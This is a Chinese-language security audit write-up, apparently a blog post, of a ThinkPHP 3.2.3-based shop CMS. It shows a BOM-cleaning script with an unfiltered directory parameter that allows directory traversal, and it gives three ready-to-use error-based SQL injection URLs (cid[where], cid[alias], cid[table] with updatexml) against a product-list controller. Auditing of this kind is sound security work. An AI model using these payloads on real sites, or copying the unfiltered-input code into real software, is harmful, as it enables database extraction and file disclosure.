hongbao商城cms-审计
前言
这cms是基于tp3.2.3的,没啥好说的。慢慢一步一步来吧!
文件遍历
首先dir参数可控,使用opendir加readdir循环导致遍历了文件,并且还可以跳目录
./killbom.php <?php /*清除rom*/ if(isset($_GET['dir'])){ $basedir=$_GET['dir']; }else{ $basedir = '.'; } $auto = 1; checkdir($basedir); function checkdir($basedir){ if($dh = opendir($basedir)){ while(($file = readdir($dh)) !== false){ if($file != '.' && $file != '..'){ if(!is_dir($basedir."/".$file)){ echo "filename: $basedir/$file ".checkBOM("$basedir/$file")." <br>"; }else{ $dirname = $basedir."/".$file; checkdir($dirname); } } }//end while closedir($dh); }//end if($dh }//end function function checkBOM($filename){ global $auto; $contents = file_get_contents($filename); $charset[1] = substr($contents, 0, 1); $charset[2] = substr($contents, 1, 1); $charset[3] = substr($contents, 2, 1); if(ord($charset[1]) == 239 && ord($charset[2]) == 187 && ord($charset[3]) == 191){ if($auto == 1){ $rest = substr($contents, 3); rewrite ($filename, $rest); return "<font color=red>BOM found, automatically removed.</font>"; }else{ return ("<font color=red>BOM found.</font>"); } } else return ("BOM Not Found."); }//end function function rewrite($filename, $data){ $filenum = fopen($filename, "w"); flock($filenum, LOCK_EX); fwrite($filenum, $data); fclose($filenum); } ?>
还可以跳目录
第一枚注入:
熟悉tp3的注入就知道涉及注入的方法为where() table() delete()等
以GET形式参入参数cid赋值给id,没有任何过滤直接查询,导致注入的产生
\Application\Home\Controller\SupermarketController.class.php
public function ProductList(){ $this->promptParse(!empty($_GET['cid']) && is_numeric($_GET['cid']), ' :(:( :('); $goodsModel = M("Goods"); $goodsClassModel = M("GoodsClass"); $id = $_GET['cid']; ············ ············ ············ ············ ············ $result = $goodsClassModel->field('fid,class_name,id')->find($id); if($id){ if($result['fid']==0){ $str = $this->getCategory($id); $str = rtrim($str,","); $str? $str1['class_id'] = array('in',$str):false; $results = $goodsClassModel->field('id,fid,class_name')->where($str1)->select(); ············· ············ ············ ············ ············ //猜一猜 // $guess_goods = $this->guess(); // $this->assign("guess_goods",$guess_goods); //商品 $this->assign("resultGoodsImgs",$resultGoodsImgs); //分页 $this->assign("page_show",$page_show); //品牌 // $this->assign("brand_list",$this->searchBrandLists()); //类型 $this->assign("goods_classes",$this->getGooodsClass()); //规格 $this->assign("goods_speces",$this->goodsSpec()); //判断是不是搜索 $this->assign("show1",$show); $this->display(); } }
payload:
http://127.0.0.1/index.php/home/Supermarket/ProductList.html?cid[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--
http://127.0.0.1/index.php/home/Supermarket/ProductList.html?cid[alias]=where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--
http://127.0.0.1/index.php/home/Supermarket/ProductList.html?cid[table]=db_test%20where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--
浙公网安备 33010602011771号